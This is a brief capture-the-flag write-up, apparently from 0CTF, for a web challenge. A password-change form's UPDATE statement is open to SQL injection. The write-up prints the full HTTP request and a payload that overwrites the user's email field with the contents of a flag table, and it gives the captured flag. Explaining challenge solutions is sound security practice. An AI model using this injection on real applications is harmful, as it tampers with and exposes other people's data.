A simple web where we can register and login in. Once logged in, we can change our password.
The home page shows a message from Tales from two cities and the email we used for log in.

There is a SQL injection affecting the UPDATE statement sent with the Modify password feature. The idea is to modify the statement to change also the email (that we can read in the home page):

POST /modify HTTP/1.1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,es-ES;q=0.8,es;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cookie: session=.eJyrVopPy0kszkgtVrKKrlZSKIFQSUpWSknhYVXJRm55UYG2tkq1OlDR8HBLQ0-PlJzk3ND0JHfLvCijsGxPd0vDFEeQqliwOjINySkFGRCro5STn56emhKfmadkVVJUmqqjVFqcWpSXmJsK1FpQnpdaZGigVAsAq0Q6FQ.B_iyaw.haWh_kdtJXPqgs1n__YSVID6vlY  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 65

password=0ewr1pn',email=(SELECT flag from flag),password='0ewr1pn  


FLAG is 0CTF{R0t_?_S8rRy_1_doNt_N}